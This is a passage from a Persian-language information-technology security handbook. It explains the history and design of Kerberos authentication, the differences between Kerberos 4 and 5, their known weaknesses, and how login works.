ﺳﺮﻳﻊ )ﺩﺭ ﺁﻧﺰﻣﺎﻥ( ،ﺩﻳﺴﻜﻬﺎﻱ ﻛﻮﭼﻚ ،ﻭ ﺭﺍﺑﻂﻫﺎﻱ ،Ethernetﺟﺎﻳﮕﺰﻳﻦ ﺳﻴﺴﺘﻢ ﻗﺪﻳﻤﻲﺗﺮ ﻛﻪ ﺍﺯ ﭘﺎﻳﺎﻧﻪﻫﺎ ﻭ ﭼﻨﺪ ﺭﺍﻳﺎﻧﺔ ﺯﻣﺎﻥﻣﺸﺘﺮﻙ
ﺗﺸﻜﻴﻞ ﻳﺎﻓﺘﻪﺑﻮﺩ ﺷﺪ .ﻫﺪﻑ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﺮﻳﻚ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﻭ ﺷﺒﻜﻪ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ.
ﺑﻪ ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﺍﻳﺴﺘﮕﺎﻩﻫﺎﻱ ﻛﺎﺭﻱ ﺷﺮﻭﻉ ﺑﻪ ﻓﻌﺎﻟﻴﺖ ﻛﺮﺩﻧﺪ ،ﻣﺸﻜﻞ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﺷﺒﻜﻪ ﺑﻪ ﻃـﻮﺭ ﺁﺯﺍﺭﺩﻫﻨـﺪﻩﺍﻱ ﺁﺷـﻜﺎﺭ ﺷـﺪ .ﭼـﻮﻥ ﺍﺯ
ﻫﻤﻪﺟﺎ ﻣﻲﺷﺪ ﺑﻪ ﺷﺒﻜﻪ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺖ ،ﻫﻴﭻ ﭼﻴﺰﻱ ﻣﺎﻧﻊ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ )ﻳﺎ ﻣﻬﺎﺟﻤﻴﻦ ﺧﺎﺭﺝ ﻣﺆﺳﺴﻪ( ﻧﻤﻲﺷﺪ ﻛﻪ ﺍﺯ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺟﺎﺳﻮﺳـﻲ
ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻨﺪ .ﺗﻘﺮﻳﺒﹰﺎ ﻏﻴﺮﻣﻤﻜﻦ ﺑﻮﺩ ﻛﻪ ﺑﺘﻮﺍﻥ ﺍﺯ ﺍﻓﺸﺎ ﺷﺪﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺻﻠﻲ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﺗﻮﺳﻂ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﻳﺎ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ
ﻣﺠﺪﺩ ﺁﻧﻬﺎ ﺩﺭ ﺣﺎﻟﺖ ﺗﻚﻛﺎﺭﺑﺮﻱ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ .ﭼﻴﺰﻱ ﻛﻪ ﻣﺸﻜﻼﺕ ﺭﺍ ﭘﻴﭽﻴﺪﻩﺗﺮ ﻣﻲﻛﺮﺩ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﺘﺼﻞ ﺑـﻪ
ﺷﺒﻜﻪ ،ﺭﺍﻳﺎﻧﻪﻫﺎﻱ IBM PC/ATﺑﻮﺩﻧﺪ ﻭ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺟﺮﺍ ﻣﻲﻛﺮﺩﻧﺪ ﻛﻪ ﺣﺘﻲ ﺍﺯ ﻣﻘﺪﻣﺎﺕ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﻢ ﺑﻲﺑﻬﺮﻩ ﺑـﻮﺩ .ﻛـﺎﺭﻱ ﺑﺎﻳـﺪ
ﺍﻧﺠﺎﻡ ﻣﻲﺷﺪ ﺗﺎ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﺩﺭ ﺷﺒﻜﻪ ﺣﺪﺍﻗﻞ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺳﻴﺴﺘﻢ ﻗﺒﻠﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﺯﻣﺎﻥﻣﺸﺘﺮﻙ ﺑﻮﺩ ﺣﻔﺎﻇﺖ ﺑﻪ ﻋﻤﻞ ﻣﻲﺁﻣﺪ.
ﺭﺍﻩﺣﻞ ﻧﻬﺎﻳﻲ MITﺑﺮﺍﻱ ﺭﻓﻊ ﺍﻳﻦ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘﻲ " "Kerberosﺑﻮﺩ؛ ﻳﻚ ﺳﻴﺴﺘﻢ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻛـﻪ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ
ﺣﺴﺎﺱ -ﻣﺜﻞ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﺑﺎﺯ -ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ DESﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩ .ﻭﻗﺘﻲ ﻛـﺎﺭﺑﺮﻱ ﺩﺭ ﻳـﻚ ﺍﻳـﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ﻛـﻪ
Kerberosﺭﻭﻱ ﺁﻥ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺍﺳﺖ ﻭﺍﺭﺩ ﺷﻮﺩ ،ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﺑﺮﺍﻱ ﺁﻥ ﻛﺎﺭﺑﺮ ﻳﻚ "ﺑﻠﻴﻂ" ﺻﺎﺩﺭ ﻣﻲﻛﻨﺪ .ﺑﻠـﻴﻂ ﻛـﺎﺭﺑﺮ
ﺗﻨﻬﺎ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺑﺎﺯ ﻣﻲﺷﻮﺩ ﻭ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺑﺪﺳﺖﺁﻭﺭﺩﻥ ﺑﻠﻴﻄﻬﺎﻱ ﺩﻳﮕﺮ ﺍﺳﺖ .ﺍﺯ ﺍﻳﻦ ﺩﻳـﺪﮔﺎﻩ ،ﻫﺮﮔـﺎﻩ ﻛـﺎﺭﺑﺮ
ﺑﺨﻮﺍﻫﺪ ﺑﻪ ﻳﻜﻲ ﺍﺯ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ ،ﺑﺎﻳﺪ ﻳﻚ ﺑﻠﻴﻂ ﺧﺎﺹ ﺁﻥ ﺳﺮﻭﻳﺲ ﺍﺭﺍﺋﻪ ﻛﻨـﺪ .ﭼـﻮﻥ ﻫﻤـﺔ ﺍﻃﻼﻋـﺎﺕ ﺑﻠـﻴﻂﻫـﺎﻱ
Kerberosﻗﺒﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﺭﻭﻱ ﺷﺒﻜﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺷﻮﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ ،ﺍﻃﻼﻋﺎﺕ ﺍﺭﺳﺎﻟﻲ ﻗﺎﺑﻞ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻫﻢ ﻧﻴﺴﺘﻨﺪ.
Kerberos 4ﻭ Kerberos 5
ﭘﻨﺞ ﺑﺎﺯﻧﮕﺮﻱ ﺍﺳﺎﺳﻲ ﺩﺭ ﺗﺎﺭﻳﺦ Kerberosﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳﺖ ﻭ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺍﺯ ﺩﻭ ﻧـﺴﺨﺔ Kerberosﺩﺭ ﺑـﺎﺯﺍﺭ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﺩ.
ﻛﺎﺭ ﻛﻨﺪ ،ﭼﻨﺪ ﺳﺎﻝ ﺍﺳﺖ ﻛﻪ ﺍﺭﺗﻘﺎ ﭘﻴﺪﺍ ﻧﻜﺮﺩﻩ ،ﻭ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻗـﺪﻳﻤﻲ ﻣﺤـﺴﻮﺏ ﻣـﻲﺷـﻮﺩ .ﺩﺭ ﺍﻭﺍﻳـﻞ ﺳـﺎﻝ ۱۹۹۶ﻓـﺎﺭﻍﺍﻟﺘﺤـﺼﻴﻼﻥ
ﺁﺯﻣﺎﻳﺸﮕﺎﻩ ) COASTﮐﻪ ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﺑﺎ ﻣﺮﮐﺰ ﺗﺤﻘﻴﻘﺎﺗﻲ CERIASﺍﺩﻏﺎﻡ ﺷﺪﻩ ﺍﺳﺖ( ﺩﺭ ﺩﺍﻧﺸﮕﺎﻩ Purdueﻳـﻚ ﺿـﻌﻒ ﻋﻤﻴـﻖ ﺩﺭ ﻧﺤـﻮﺓ
ﺳﺎﺧﺘﻪﺷﺪﻥ ﻛﻠﻴﺪ Kerberos 4ﻛﺸﻒ ﻛﺮﺩﻧﺪ ﻛﻪ ﺑﻪ ﻣﻬﺎﺟﻢ ﺍﺟﺎﺯﻩ ﻣﻲﺩﺍﺩ ﻛﻠﻴﺪﻫﺎﻱ ﻧﺸﺴﺖ ﺭﺍ ﺩﺭ ﻋﺮﺽ ﭼﻨﺪ ﺛﺎﻧﻴﻪ ﺣﺪﺱ ﺑﺰﻧﺪ .ﻫﺮﭼﻨﺪ
ﺑﺮﺍﻱ ﺍﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻳﻚ ﺍﺻﻼﺡ ﺑﺼﻮﺭﺕ ﮔﺴﺘﺮﺩﻩ ﺗﻮﺯﻳﻊ ﺷﺪ ،ﺍﻣﺎ ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﺑﻌﻀﻲ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ Kerberos 4ﺩﺭ ﺑﺮﺍﺑﺮ
ﺣﻤﻼﺕ ﺳﺮﺭﻳﺰﻱ bufferﻫﻢ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ ﻭ ﻫﻴﭻ ﺍﺻﻼﺣﻲ ﻧﻴﺰ ﺑﺮﺍﻳﺸﺎﻥ ﺍﺭﺍﺋﻪ ﻧﺸﺪﻩ ﺍﺳﺖ.
Kerberos 5ﻣﺸﻜﻼﺕ ﺷﻨﺎﺧﺘﻪﺷﺪﺓ ﭘﺮﻭﺗﻜﻞ Kerberosﺭﺍ ﺭﻓﻊ ﻛﺮﺩ ﻭ ﺁﻧـﺮﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺣﻤـﻼﺕ ﻣﻌﻤـﻮﻝ ﺷـﺒﻜﻪ ﻣﻘـﺎﻭﻣﺘﺮ ﺳـﺎﺧﺖ.
Kerberos 5ﻫﻤﭽﻨﻴﻦ ﺍﻧﻌﻄﺎﻑﭘﺬﻳﺮﺗﺮ ﺍﺳﺖ ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺷﺒﻜﻪ ﻛﺎﺭ ﻛﻨﺪ Kerberos 5 .ﻫﻤﭽﻨﻴﻦ ﭘﻴﺶﺑﻴﻨﻲﻫﺎﻳﻲ ﺑـﺮﺍﻱ
ﻛﺎﺭ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻏﻴﺮ DESﺩﺍﺭﺩ .ﺍﮔﺮﭼﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﻲ ﻣﺜﻞ DESﺳﻪﮔﺎﻧﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩﺍﻧﺪ ،ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬـﺎ ﭼﻨـﺪﺍﻥ
ﮔﺴﺘﺮﺩﻩ ﻧﻴﺴﺖ ،ﺑﻴﺸﺘﺮ ﺑﻪ ﺩﻟﻴﻞ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻗﺪﻳﻤﻲ ﻛﻪ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩﺍﻧﺪ.
171 Massachusetts Institute of Technology
172 Timesharing
ﺑﺨﺶ ﭘﻨﺠﻢ
Kerberos 4ﺍﺯ Kerberos 5ﻛﺎﺭﺁﻣﺪﺗﺮ ﺍﻣﺎ ﻣﺤﺪﻭﺩﺗﺮ ﺍﺳﺖ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ Kerberos 4ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺭﻭﻱ ﺷﺒﻜﻪﻫﺎﻱ TCP/IP
٣٣٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ Kerberos 5ﭼﻨﺪ ﻗﺎﺑﻠﻴﺖ ﺟﺪﻳﺪ ﻧﻴﺰ ﺩﺍﺭﺩ :ﺍﻣﻜﺎﻥ ﺗﻔﻮﻳﺾ ﺷﺪﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ،ﺑﻠﻴﻄﻬﺎﻳﻲ ﺑﺎ ﺯﻣﺎﻥ ﺍﻧﻘـﻀﺎﻱ ﺑـﻴﺶ ﺍﺯ
۲۱ﺳﺎﻋﺖ ،ﺑﻠﻴﻄﻬﺎﻱ ﺗﺠﺪﻳﺪ ﭘﺬﻳﺮ ،ﺑﻠﻴﻄﻬﺎﻳﻲ ﻛﻪ ﺯﻣﺎﻧﻲ ﺩﺭ ﺁﻳﻨﺪﻩ ﻓﻌﺎﻝ ﻣﻲﺷﻮﻧﺪ ،ﻭ ﮔﺰﻳﻨـﻪﻫـﺎﻱ ﺑـﺴﻴﺎﺭ ﺩﻳﮕـﺮ .ﭼﻨﺎﻧﭽـﻪ ﻣـﻲﺧﻮﺍﻫﻴـﺪ ﺍﺯ
Kerberosﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ Kerberos 5ﺭﺍ ﺑﻜﺎﺭ ﺑﺒﺮﻳﺪ IETF.ﺭﻭﻱ ﺑﺎﺯﻧﮕﺮﻱ ﻭ ﺗـﺸﺮﻳﺢ RFCﺷـﻤﺎﺭﺓ - ۱۵۱۰ﻛـﻪ
Kerberos 5ﺭﺍ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﺪ -ﻛﺎﺭ ﻛﺮﺩﻩ ﻭ ﭼﻨﺪ ﺗﻮﺳﻌﺔ ﻗﺎﺑﻞ ﺍﻧﺘﻈﺎﺭ ﺑﺮﺍﻱ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﭘﻴﺸﻨﻬﺎﺩ ﺩﺍﺩﻩ ﺍﺳﺖ.
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ Kerberos
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﺭ Kerberosﺗﻤﺎﻣﹰﺎ ﺑﺮ ﺍﺳﺎﺱ ﺩﺍﻧﺴﺘﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﻪ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ Kerberosﺫﺧﻴﺮﻩ ﺷﺪﻩﺍﻧﺪ ﻣﻲﺑﺎﺷﺪ.
ﺑﺮﺧﻼﻑ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ Unixﻛﻪ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻳﻜﻄﺮﻓﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﻧﺪ ،ﺭﻣﺰ ﻋﺒﻮﺭ Kerberosﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺫﺧﻴﺮﻩ ﻭ ﺑﺎ ﻳـﻚ
ﺍﻟﮕﻮﺭﻳﺘﻢ ﻣﺘﺪﺍﻭﻝ -ﺩﺭ ﺍﻛﺜﺮ ﻣﻮﺍﺭﺩ - DESﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ ،ﻭ ﻟﺬﺍ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﺻﻮﺭﺕ ﻧﻴﺎﺯ ﺑﻮﺳﻴﻠﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﺷـﻮﺩ.
ﻛﺎﺭﺑﺮ ﻧﻴﺰ ﺑﺎ ﺍﺛﺒﺎﺕ ﺁﮔﺎﻫﻲ ﺧﻮﺩ ﺍﺯ ﻛﻠﻴﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ،ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﺗﺼﺪﻳﻖ ﻣﻲﻧﻤﺎﻳﺪ.
ﺍﻳﻦ ﺣﻘﻴﻘﺖ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﺑﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﻣﺰﮔﺸﺎﻳﻲﺷﺪﺓ ﻛﺎﺭﺑﺮ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﺩ ﻧﺘﻴﺠـﺔ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ Kerberosﺍﺯ
ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﺪ ١٧٣.ﺍﻳﻦ ﻳﻚ ﻋﻴﺐ ﺟـﺪﻱ ﺳﻴـﺴﺘﻢ Kerberosﺍﺳـﺖ .ﻣﻌﻨـﻲ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻫﻢ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜﻲ ﺍﻳﻤﻦ ﺑﺎﺷﺪ ﻭ ﻫﻢ "ﺍﻳﻤﻨﻲ ﻣﺤﺎﺳﺒﺎﺗﻲ" ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜـﻲ ﺍﻳﻤـﻦ
ﺑﺎﺷﺪ ﺗﺎ ﺍﺯ ﺩﺯﺩﻳﺪﻩ ﺷﺪﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻭ ﺍﻓﺸﺎﻱ ﻫﻤﺔ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺟﻠﻮﮔﻴﺮﻱ ﺷﻮﺩ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺎﻳﺪ ﻧـﺴﺒﺖ ﺑـﻪ ﺣﻤـﻼﺕ
ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﻳﻤﻦ ﺑﺎﺷﺪ ،ﭼﺮﺍﮐﻪ ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﻭﺍﺭﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺷﻮﺩ ﻭ ﺩﺳﺘﺮﺳﻲ " "rootﭘﻴﺪﺍ ﻛﻨﺪ ،ﺑـﺎﺯ ﻫـﻢ ﻣـﻲﺗﻮﺍﻧـﺪ ﻫﻤـﺔ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺑﺪﺯﺩﺩ.
Kerberosﺑﮕﻮﻧﻪﺍﻱ ﻃﺮﺍﺣﻲ ﺷﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺁﻥ ﺑﺘﻮﺍﻧﺪ ﻣﺴﺘﻘﻞ ﺍﺯ ﺣﺎﻟﺖ ﺑﺎﺷﺪ .ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﻓﻘـﻂ ﺑـﻪ ﺗﻘﺎﺿـﺎﻫﺎﻱ ﻛـﺎﺭﺑﺮﺍﻥ
ﭘﺎﺳﺦ ﻣﻲﺩﻫﺪ ﻭ ﻫﺮﮔﺎﻩ ﻻﺯﻡ ﺑﻮﺩ ﺑﻠﻴﻂ ﺻﺎﺩﺭ ﻣﻲﻛﻨﺪ .ﺍﻳﻦ ﻃﺮﺍﺣﻲ ﺍﻳﺠﺎﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺗﻜﺮﺍﺭ ﻭ ﺛﺎﻧﻮﻳﻪ -ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺩﺭ ﺩﺳـﺘﺮﺱ
ﻧﺒﻮﺩﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻـﻠﻲ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ﺗﻘﺎﺿـﺎﻫﺎﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﭘﺎﺳـﺦ ﺩﻫﻨـﺪ -ﺭﺍ ﻧـﺴﺒﺘﹰﺎ ﺁﺳـﺎﻥ ﻣـﻲﻛﻨـﺪ .ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺍﻳـﻦ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺛﺎﻧﻮﻳﻪ ﻧﻴﺎﺯ ﺑﻪ ﻧﺴﺨﻪﻫﺎﻱ ﻛﺎﻣﻠﻲ ﺍﺯ ﺗﻤﺎﻡ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻱ Kerberosﺩﺍﺭﻧﺪ ،ﻛﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛـﻪ
ﺁﻧﻬﺎ ﻧﻴﺰ ﺑﺎﻳﺪ ﻫﻢ ﺍﺯ ﻧﻈﺮ ﻓﻴﺰﻳﻜﻲ ﻭ ﻫﻢ ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﺍﻳﻤﻦ ﺑﺎﺷﻨﺪ.
ﻭﺭﻭﺩ ﺍﻭﻟﻴﻪ ﺑﻪ ﺳﻴﺴﺘﻢ
ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮ ،ﻭﺭﻭﺩ ﺑﻪ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﻪ ﺍﺯ Kerberosﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻣﺸﺎﺑﻪ ﻭﺭﻭﺩ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪ ﻋﺎﺩﻱ ﺍﺳﺖ؛ ﻳﻌﻨـﻲ ﻧـﺎﻡ
ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺗﺎﻳﭗ ﻣﻲﻛﻨﺪ ﻭ ﺍﮔﺮ ﺻﺤﻴﺢ ﺑﻮﺩﻧﺪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻣﻲﺷﻮﺩ ﻭ ﻛﺎﺭﺑﺮ ﭘﺲ ﺍﺯ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺑـﻪ ﻓﺎﻳﻠﻬـﺎ ،ﭘـﺴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﭘﺮﻳﻨﺘﺮﻫﺎ ،ﻭ ﺳﺎﻳﺮ ﻣﻨﺎﺑﻊ ﻣﺸﺎﺑﻪ ﺩﺳﺘﺮﺳﻲ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ.
ﺍﻟﺒﺘﻪ ﺁﻧﭽﻪ ﺩﺭ ﭘﺲ ﭘﺮﺩﻩ ﺭﺥ ﻣﻲﺩﻫﺪ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩﺗﺮ ﺍﺳﺖ .ﻭﻗﺘﻲ ﺑﺮﻧﺎﻣﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺍﻳـﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ - ١٧٤sshd -ﻳـﺎ ﻛﺘﺎﺑﺨﺎﻧـﺔ
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ -ﻣﺜﻞ ) - PAMﻳﺎ ﻳﻚ daemonﺩﻳﮕﺮ ﺷﺒﻜﻪ( Kerberosﺭﺍ ﻣﻲﺷﻨﺎﺳﺪ ،ﺍﺯ ﺳﻴﺴﺘﻢ Kerberosﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ
ﻛﺎﺭﺑﺮ ﺑﻬﺮﻩ ﻣﻲﺑﺮﺩ.
۱۷۳ﭼﻮﻥ ﺯﻣﺎﻧﻴﻜﻪ kerberosﺗﻮﻟﻴﺪ ﺷﺪ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻫﻤﭽﻨﺎﻥ ﺗﺤﺖ ﺣﻔﺎﻇﺖ ﻗﺎﻧﻮﻥ ﻣﺎﻟﻜﻴﺖ ﻣﻌﻨﻮﻱ ﺑـﻮﺩ ،ﺍﺯ ﺁﻥ ﺩﺭ kerberosﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤـﻲﺷـﻮﺩ .ﻳـﻚ
ﭘﻴﺸﻨﻬﺎﺩ ﺍﻭﻟﻴﻪ ﺍﺯ ﻃﺮﻑ IETFﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﻌﻨﻮﺍﻥ "ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺁﻏﺎﺯﻳﻦ ﺩﺭ "kerberosﻣﻌﺮﻓﻲ ﺷﺪﻩ ،ﻭ ﺭﻭﺷـﻬﺎﻳﻲ ﺑـﺮﺍﻱ ﺍﺩﻏـﺎﻡ
ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﺎ kerberosﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ .ﺍﻳﻦ ﭘﻴﺸﻨﻬﺎﺩ ﺑﻮﺳﻴﻠﺔ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩ ﺍﺳﺖ.
۱۷۴ﻭﺻﻠﻪﻫﺎﻱ OpenSSHﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ Kerberos 5ﺩﺭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ:
http://www.sxw.org.uk/computing/patches/openssh.html
